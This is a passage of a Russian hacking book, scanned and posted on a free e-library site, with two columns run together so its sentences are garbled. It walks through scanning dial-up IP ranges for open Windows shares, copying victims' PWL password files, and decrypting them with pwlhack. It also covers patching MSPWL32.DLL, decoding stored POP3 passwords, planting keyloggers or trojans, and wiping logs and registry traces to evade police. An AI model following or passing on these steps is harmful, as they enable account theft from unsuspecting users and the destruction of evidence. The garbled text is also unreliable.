как и они, данными с ними может Пуск Найти Компьютер, пишешь имя обмениваться кто угодно из всемирной или IP адрес нужного компьютера и паутины (pwl, user.dar, system.dat и.т.д.). смотришь его через проводник. Второй Еще хорошо работать с университетскими вариант: ты можешь сделать тоже самое в компами, они также часто висят на окне NBScan, нажав на правую кнопку локальной сети с доступом в Internet, и мыши и выбрав Open Computer. И, несут на себе такой же отпечаток наконец, ты можешь подключить ресурсы ущербности Microsoft, как и домашние как удалённые сетевые диски, используя локалки. закладку Share. В поле Share Name вводите информацию в виде «\\имя Теперь ближе к телу компьютера\папка» разумеется, без (EssentialNetTools скачаны и установлены).

кавычек, жмёте Mount.

Первая закладка NBScan сканирует заданный тобой диапазон IP на предмет Наиболее оптимальным считается компьютеров с открытыми для доступа подключение удалённого сетевого диска, папками, дисками. Найдя компьютер, в что позволяет достигать наивысшей графе RS которого стоит YES, копируешь скорости обмена данными.

его IP во вторую закладку NATShell Кстати NetTool (те, что Essential) (starting ip = ending ip), use default NAT list работают только месяц после установки, не должно быть помечено. Жмёшь Go и но эта такая клёвая программа, что ради идёшь ползать по сети (если защита этого не жалко переместить системное слабая, то долго ждать не придётся). Если время на год назад (всё будет работать, удастся установить связь, будет выдан только во время сканирования NBScan список доступных ресурсов и какие из них нельзя наводить мышь на появляющиеся доступны для записи. Далее открываешь компы и работать с закладками лучше по закладку LMHost и вносишь в очереди, для надёжности).

соответствующие поля IP и имя компьютера, до которого удалось 135 Хакинг с самого начала Хакинг с самого начала указанного индивидуума он, чаще всего, Бесплатный Internet нес определенную смысловую нагрузку. И Все изложенное ниже предназначено было в этом слабое место данного метода.

только для ознакомления с возможной Теперь только в дешевых фильмах можно опасностью и ни в коем случае не должно увидеть некоего гражданина, копающегося быть использовано, если это причинит в мусорной корзине своей жертвы в ущерб каким либо физическим или надежде узнать имена, фамилии, даты юридическим лицам. Это может повлечь рождения всех родственников таковой за собой административную или вплоть до десятого колена, а также клички уголовную ответственность в соответствии всех их собак, кошек, крыс, хомяков и с действующим законодательством. тараканов. А как же еще: что тебе, например, первым приходит на ум?

Во все времена были люди, которые Конечно: имя твоей (а чаще не твоей) старались что либо утаить от других. Но подружки или кличка замученного были и другие: те, которые с этим были не домашнего животного, ну или слово какое согласны и всячески старались тайны непотребное. Наиболее продвинутые первых узнать. И вот придумали первые хакеры начали составлять специальные вход в Internet с паролем, ибо денег сие словари с учетом наиболее часто удовольствие стоит, а вторые сразу начали встречающихся в паролях слов.

этот пароль отыскивать всеми возможными и невозможными способами. Все это, в конце концов, положило конец первой стадии и началась вторая:

Когда то давно пароль пользователь теперь компьютер генерирует некоторую мог выбирать сам. С одной стороны, это псевдослучайную последовательность букв, было очень удобно: если сам слово цифр и разных знаков препинания.

заветное это придумал, то уж не забудешь Хорошо то как стало: «Lta13?Lp» — никогда (если только пребывал в этот попробуй подбери! Но тут возникла другая момент в здравом уме и твердой памяти, проблема: а попробуй ка запомни!

но это уже к делу не относится). Пароль Пользователи наши начали их на же выбирался не просто так: для бумажках записывать, ну и периодически… 137 Хакинг с самого начала Хакинг с самого начала правильно: бумажки терялись, соответствует логину данного юзверя. Эти похищались, попадали в мусорную файлы, в принципе, зашифрованы корзину и т.д. — от чего ушли, к тому и достаточно прилично. Если кому либо пришли! И тогда какая то умная голова интересно, то, взяв в руки какой нибудь догадалась, что пароль можно хранить не в дизассемблер (HIEW, QVIEW), можно голове, а прямо на жестком диске. В посмотреть процедуру шифрования. Она DialUp окне галочку поставить и находится в файле MSPWL32.DLL. Там запомнить пароль. У компьютера мозги все очень накручено. Имеется счетчик кремниевые — ему все равно, что (назовем его N) от нуля до «сколько запоминать. Ну, а раз запомнили, то, само надо». Имеются три таблицы. В собой, и записать надо. Ну, а раз записать, соответствии со счетчиком N берется байт то… правильно: отвернулся наш из первой таблицы (X). По смещению пользователь, а тут толпа голодных до X+N, урезанному до 8 бит, из второй Internet хакеров налетела — и пароль таблицы берется другой байт (Y). Затем по подсмотрела… И тогда пароли стали адресу X+Y, опять же урезанному до шифровать. бит, из третьей таблицы берется третий байт (Z). После столь хитрых Интимные подробности манипуляций командой XOR с байтом Z шифруется байт информации, после чего Где же хранятся пароли в Windows счетчик инкрементируется, и все 95/98? Известно где, зашифрованные повторяется сначала (как тебе, а?). Как пароли в Windows 95/98 хранятся в формируются сами таблицы? Не знаю основном каталоге, в файлах с (мне было лень выяснять).

расширением PWL. С учетом того, что не Расшифровывается все это аналогично только «у нас здесь», но и «у них там» (той же процедурой), ибо команда XOR бывают персональные компьютеры обратима. То, какие Винды у тебя стоят — коллективного пользования, да и сети значения не меняет. Не знаю уж, в чьих локальные местами встречаются (правда, нездоровых мозгах могла появиться мысль редко), на каждого пользователя заводится использовать для шифрования команду xor свой PWL. Кстати, название файла 139 Хакинг с самого начала Хакинг с самого начала byte ptr [eax+ebp],cl. Может, запутать пользователей могут возникнуть лишние хотели? Но команда уникальна, такие вопросы и подозрения.

команды в обычных программах еще Я все так и сделал, скажешь ты, а поискать надо. Стало быть, ищем вот тот юзер в Windows с паролем входил, соответствующую ей комбинацию 30h, а мне теперь не войти — пароля то я не 0Ch, 28h — и все дела. Дальше — просто.

знаю. Что делать? Не беда! Есть способ Берем MSPWL32.DLL и, со смещения проще! Уносим только USER.DAT! А 511h (или там, где найдем), ставим 90h, теперь: Windows 95 — M. D.! Как тебе 90h, 90h — команды NOP (пустая должно быть известно, кроме операция). И все, команда не интерактивного доступа в Internet, выполняется! Что при этом произойдет?

провайдеры еще и e mail впаривают Да ничего! Ничего страшного и даже не суповым набором. Так вот, чтобы залезть в очень страшного. И даже никто ничего не твой почтовый ящик, в тот, что у тебя в заметит!!! Все останется как всегда, с подъезде, нужен ключ (или лом). Чтобы одним лишь исключением: все залезть в твой e mail, нужен пароль (или логины/пароли будут видны, так сказать, виртуальный лом). И тут я скажу: все невооруженным глазом!

поголовно провайдеры в славном городе Тут, правда, есть два неприятных Москве — M. D.! Пароль к POP3 ящику момента. Во первых, во время работы всегда тот же, что и DialUp! Ну и что? А Windows тебе не удастся подобным вот что. Пароль e mail находится не в образом надругаться над их «святая PWL’е, а в USER.DAT, и зашифрован он святых»: писать в этот файл нельзя. не так сильно, вернее, почти совсем не Значит, придется перегружаться в режиме зашифрован! А это как??? Да вот так!

эмуляции MS DOS, а это лишнее время, Метод «шифрования» напоминает которого может не быть. элементарное UUE кодирование, иначе говоря, из трех байтов делают четыре или Во вторых, а это еще хуже, тебе надо из 8 битов — 10. Весь исходный пароль будет стереть все PWL’ы, иначе даже в разбивается на части по три байта. В Windows не пустят: а вот тут у законных результирующей строке на один символ 141 Хакинг с самого начала Хакинг с самого начала отводится 10 битов. Теперь к каждому символов. С подбором третьего символа байту исходной строки прибавляется 30h, все четыре байта должны совпасть! Если если сумма больше, чем 7Ah, то он нет — извини, no sex for you. Естественно, становится равен 30h, а к паре 9 и 10 после каждой замены символа жми битов добавляется единица. Однако есть «Применить». Результат контролируем исключения. Если общая длина строки REGEDIT’ом, переходя вверх/вниз для пароля не кратна трем, то она дополняется обновления информации. Когда первые байтами 3Dh. Судя по всему, это 0Dh три символа подобраны, возвращаемся к (конец строки) + 30h. В конце строки (*) для следующих трех и т.д. до победного 0Dh, 0Ah: стандартное завершение. На конца. Разумеется, байт(ы) 3Dh подбирать мой взгляд, подобрать пароль вручную не нужно! После некоторой тренировки на проще, чем написать соответствующую все это уходит минут 15.

программу: не каждый же день ты эти Где же это счастье хранится? И, пароли подбираешь! Где находится пароль вообще, кроме логина и пароля еще — написано ниже, оттуда его и берем. А многое нужно знать, а откуда, не звонить принцип прост: запускаем Internet Mail, же провайдеру? Не надо никому звонить!

заходим в Сообщение & reg;

Параметры Все в нем, в USER.DAT.

Сервер. Запускаем REGEDIT, переходим в HKEY_CURRENT_USER/RemoteAcce HKEY_CURRENT_USER/Software/Microsof ss/Addresses: и мы имеем список t/InternetMail and News/Mail/POP3/Твой подключений. Да, но там ничего не видно, сервер: смотрим Password. Удаляем пароль цифры какие то… А ты чего хотел, в Internet Mail. Первый подбираемый дружок! Выбираем байт, которого больше символ влияет на первый и второй байты, всего, и дешифруем им все остальные второй — на второй и третий, третий — на (обычный XOR). В результате в куче третий и четвертый. Теперь подбираем всякой ерунды получаем ASCII строку с символ так, чтобы первый байт совпал с номером модемного телефона провайдера оригиналом, а второй или совпал, или был (потеть, конечно, придется, если друг самый большой, но меньше оригинала.

совсем не знакомый или работает Аналогично для второго и третьего 143 Хакинг с самого начала Хакинг с самого начала партизаном, а знакомого и спросить Существуют программы типа SPYWIN, можно — типа: «Что это за провайдер у или HOOKDUMP, или KEYWITNESS.

тебя такой не хилый, друг ты мой лучший, Они записывают все действия, Миша»?). производимые на компьютере. Достаточно подсадить одну из них и все… HKEY_CURRENT_USER/RemoteAccess/Profile Естественно, их можно использовать и для /"подключение"/IP: со смещения 0Ch других не менее интересных целей.

четыре байта задом наперед — это первичный DNS, затем еще четыре И в конце могу тебе посоветовать: не вторичный и т.д.

качай и уж тем более не запускай у себя HKEY_CURRENT_USER/RemoteAccess/Profile всякие «взломщики Internet». Они могут / "подключение"/User: логин.

крякнуть только информацию на твоем HKEY_CURRENT_USER/Software/Microsoft/ винчестере! Ибо тот, кто может взломать Windows/CurrentVersion/InternetSetting провайдера, никогда не будет опускаться s/ProxyServer: Proxy сервер и порт.

до таких мелочей, а другие в лучшем HKEY_CURRENT_USER/Software/Microsoft/I случае хотят над тобой просто посмеяться, nternetMail and News/Mail:

в худшем — сделать бяку.

DefaultPOP3Server:

А знаешь ли ты, друг мой, о том, как DefaultSMTPServer:

хакеры «вытаскивают» твои драгоценные SenderEMail:

аккаунты прямо у тебя из под носа?

Name:

Существует достаточно много случаев, Organization: это все и так когда пользователь с удивлением для себя понятно.

обнаруживает, что за его счет бродит по POP3 "POP3 сервер":

просторам Internet кто то еще и, Account: это понятно естественно, тратит направо и налево его Password: ну вот и он, родимый потом и кровью заработанные деньги.

Что делать, если пользователь — Обнаружив столь неприятное мазохист? Не хранит он пароль в происшествие, он в ярости (или в компьютере, а вводит его каждый раз с недоумении — кто как) звонит в клавиатуры? И этому горю можно помочь.

145 Хакинг с самого начала Хакинг с самого начала техподдержку своего провайдера и адресов одной сетки. Что для этого объясняет причину своего недовольства. нужно? Для Windows 95/98/NT — Провайдер приносит свои соболезнования, программа «Legion». После запуска этой но, к сожалению, ничем помочь не может, программы нужно указать IP адреса, однако, предлагает сменить пользователю которые будут использоваться для пароль и советует не допускать до сканирования. Сначала хакер выбирает компьютера тех людей, которые не предполагаемого провайдера, услугами достойны доверия. А самое главное, что которого впоследствии он будет тем людям, которые платят свои деньги за пользоваться. Например, это будет часы, проведенные в Internet, провайдер выдуманный нами провайдер не собирается возмещать ни денег, ни www.lamerishe.ru. Запустив свой mIRC, он времени. Разочаровавшись и обвиняя во отправляется на всем знакомый IRC и в всех мнимых грехах техническую окошке «status» пишет: /whois поддержку, ты размышляешь о том, как *.lamerishe.ru.

же этому гадскому хакеру удалось украсть Ответ не заставит себя ждать:

твой аккаунт, и с обидой в душе на этот #RUSSIAN Andrey H andrey@dialup жестокий мир подумываешь о смене 28059.lamerishe.ru :0 hello.

провайдера. Итак, каким же образом хакер *.junk.com смог «вытащить» твой аккаунт?

End of /WHO list.

На сегодняшний день мне известны Дальше следует команда:

несколько методов, которые используют /dns Andrey хакеры. Обычно многие юзеры, И mIRC выдает ему IP шник устанавливая Windows 95/98/NT под сети, жертвы:

предоставляют доступ к своим дискам и директориям другим пользователям сети, *** Looking up dialup тем самым открывая лазейку в свой 28059.lamerishe.ru компьютер. Для того чтобы в сети найти *** Resolved dialup компьютер с такой лазейкой, хакеру 28059.lamerishe.ru to 121.31.21. необходимо просканировать диапазон IP 147 Хакинг с самого начала Хакинг с самого начала Вот он уже и знает один из IP в каталоге Windows. И поэтому хакер адресов (121.31.21.10) нашего выдуманного заходит в «Пуск Программы Сеанс провайдера. Теперь нужно указать MS DOS». Пишет там «e:» и нажимает диапазон IP адресов этого провайдера. Enter. Теперь он на жестком диске у Хакер запускает Legion и заполняет поля чайника. Но каталог Windows может «Enter Start IP» (введите начальный IP) и называться по другому. Поэтому он «Enter End IP» (введите конечный IP). пишет: E:\>dir win* и получает такой вот ответ:

Enter Start IP: 121.31.21. Enter End IP: 121.31.21.254 Том в устройстве Е не имеет метки Серийный номер тома: 2247 15D Остается только выбрать скорость Содержимое каталога Е:\ соединения и нажать на кнопку «Scan».

WIN95 <КАТАЛОГ> 11 30 98 6:48p WIN Если после сканирования, в правом окне 0 файл(а,ов) 0 байт сканера, появится 1 каталог(а,ов) 287,997,952 байт что то вроде «\\121.31.21.87\C», то в свободно левом окне можно открыть этот IP и щелкнуть два раза на ответвлении «C». Дальше следуют команды:

Появится сообщение «MAPPED ON E:\>cd win DRIVE E:». Все это означает, что на E:\WIN95>dir *.pwl данном IP есть машина, c незашаренным Том в устройстве Е не имеет метки (то есть открытым для всех) диском С. И Серийный номер тома: 2247 15D этот диск можно установить как еще один Содержимое каталога Е:\WIN диск на своем компе. То есть у хакера на ANDREY PWL 730 02 05 99 10:31p компе появится еще один диск (в данном ANDREY.PWL случае — Е), по которому он будет лазить, 1 файл(а,ов) 730 байт как по своему собственному, хотя он и 0 каталог(а,ов) 287,997,952 байт находится на удаленной машине. Конечно, свободно главной целью для хакера является файл с E:\WIN95>copy andrey.pwl расширением.pwl, в котором находится c:\hacking\pwlhack зашифрованный аккаунт. Этот файл лежит 149 Хакинг с самого начала Хакинг с самого начала Теперь, после копирования файла с по просторам всемирной паутины Internet.

расширением.pwl, хакеру нужно А вот и сам аккаунт:

отсоединиться от этого компьютера. Он Имя пользователя: L5tRe открывает иконку «Мой компьютер», Пароль: fsa3Xfa выбирает иконку E:\121.31.21.87\C, нажав Если у данного провайдера можно правую кнопку мыши. Там жмет посмотреть статистику прямо из Internet, «Отсоединить». Что теперь? А теперь он то, обычно, хакеры посещают сайт берет программу pwlhack и с помощью нее провайдера (в нашем примере расшифровывает добытый файл andrey.pwl.

www.lamerishe.ru) и смотрят, сколько C:\HACKING\PWLHACK>pwlhack.exe /list осталось денег на счету у пользователя и в andrey.pwl andrey какое время он обычно находится в (C) 17 Apr 1998y by Hard Wisdom Internet. Кстати, телефоны модемных "PWL's Hacker" v3.0 (1996,97,98) пулов также можно узнать на сайте у Enter the password:

провайдера.

File 'ANDREY.PWL' has size Существует еще несколько иных bytes, version [NEW_Win95_OSR/2] способов, таких как использование for user 'ANDREY' with password '' троянов Netbus1.0, Netbus Pro 2.0, contains:

BackOrifice и т.д. Самый простой из всех [Type] [The resource location способов заключается в том, что, зная IP string] [Password] адрес с открытыми сетевыми ресурсами, Dial X *Rna\Соединение с можно соединиться с компьютером, нажав lamerishe\L5tRe fsa3Xfa на Пуск, выбрав «Поиск компьютера» и указав IP адрес.

Indexed Entryes: 1;

Number of «Все. Систему я понял. Теперь resources: 1.

объясни ка мне, как устранить лазейку и защитить себя от непрошеных гостей?» — Настает кульминационный момент!

скажешь ты. Хорошо. Для защиты от Итак, теперь с помощью аккаунта, описанной выше дырки тебе будет добытого у «чайника», хакер может лазить 151 Хакинг с самого начала Хакинг с самого начала необходимо отключить привязку (службу него никуда. Это блок бесперебойного доступа к файлам и принтерам) от питания. Чтобы когда в доме вырубят контроллера удаленного доступа (лезь в свет, ты успел все прочистить. Во первых, Панель управления Сеть), а в Windows сотри все файлы с паролями, хакерский NT нужно запретить службу Server в софт, history аськи и так далее. Но просто Remote Access WAN Wrapper. Но от стереть мало. На самом деле когда ты НетБаса, БэкОрифиса и подобных троянов «стираешь» файл, на харде он помечается это тебя не спасет. А вот чтобы не как «удаленный», и когда места перестанет подхватить трояна, во первых, никогда не хватать, он новую инфу запишет поверх подпускай никого к своему компьютеры него. Так, конечно, не во всех файловых со всякими дискетками, а, системах, но в большинстве. Для во вторых, никогда не запускай у себя на затирания пустого места тебе необходима компе никаких программ, в которых ты программа под названием PGPErase. Она хоть на грамм сомневаешься. Последним входит в комплект PGP, который можно хакерским способом по рассылке троянов скачать на сайте PGPi (где то в районе был массовый спаминг с хоста девяти метров). Вообще PGP — классная microsoft.com, где в каждом письме лежал штука (хотя недавно для нее был написан якобы патч к 4 му IE. Ну, а что этот кряк). Особо полезны утилиты PGPErase, «патч» делал, я думаю, ты уже догадался. PGPDisc и PGPMail. Про PGPErase мы говорили. PGPDisc — это утилитка для создания виртуального диска. Как она Чистим логи действует. Ты создаешь папку, которая потом станет диском. Запускаешь В этот раз мы напишем про то, как PGPDisc, он ее зашифровывает и прочистить логи на своем компе. Надо это помещает в файл *.pgd. Диск этот для того, чтобы когда к тебе в квартиру изначально «невидимый». Чтобы он вломятся друзья дворника (ОМОН), они активизировался, надо набрать ничего не смогли обнаружить на твоем офигительный шифр. В случае чего, его винте. Начнем с того, что тебе надо в можно вырубить клавишами Ctrl+F12.

срочном порядке приобрести UPS. Без 153 Хакинг с самого начала Хакинг с самого начала PGPMail служит для шифрования Вот так вот все просто. Но, надеюсь, почтовых сообщений. что ты себе такой файл делать не будешь.

Для добавления строчек надо сделать все Теперь прочистим реестр. Сделать так же, только вместо слова Del написать это достаточно легко. Просто удаляешь слово Add и после адреса ключа строчки со спертыми данными и все. Но вписывать:

мы с тобой сейчас попробуем 0,"параметр" автоматизировать этот процесс. Сначала надо все это дело сохранить в каком Но просто так ты инфы не нибудь файле, после чего склепать из него запустишь. Допустим, у тебя INF файл два файла INF (для загрузки всего этого в называется CSU.INF (хотя я, конечно, реестр и удаления из него). Для понимаю, что я обнаглел). Тогда его надо автоматизации этой работы советую будет запускать командой:

скачать маленькую программку по адресу RUNDLL.EXE http://www.xakep.ru/soft/5/reg2inf.exe. Как SETUPX.DLL,InstallHinfSection склепать все ручонками, думаю, ты DefaultInstall 64 c:\csu.inf знаешь. Например, чтобы INF файл Все. Больше мы — не твоя стартовая удалял из твоего реестра запись о том, что страничка. Дальше надо вытереть файлы CSU — твоя домашняя страничка, код USER.DA0 и SYSTEM.DA0 (это что то должен быть таким:

типа backup’а реестра). Я бы посоветовал [Version] написать батник, убивающий эти файлы и Signature="$…$" заодно прочищающий реестр. То есть, LayoutFile=bla.inf если твой файл для вырезания строчек из реестра называется CSU.INF, а для [DefaultInstall] добавления в реестр инфы CSUADD.INF, DelReg=del.Reg то батник будет выглядеть следующим образом:

[del.Reg] RUNDLL.EXE HKCU,"SOFTWARE\Microsoft\Internet SETUPX.DLL,InstallHinfSection Explorer\main","Home Page" 155 Хакинг с самого начала Хакинг с самого начала DefaultInstall 64 csu.inf позволило добиться неожиданно ATTRIB H R S «хороших» результатов.

Pages:     || 2 |



© 2011 www.dissers.ru - «Бесплатная электронная библиотека»

Материалы этого сайта размещены для ознакомления, все права принадлежат их авторам.
Если Вы не согласны с тем, что Ваш материал размещён на этом сайте, пожалуйста, напишите нам, мы в течении 1-2 рабочих дней удалим его.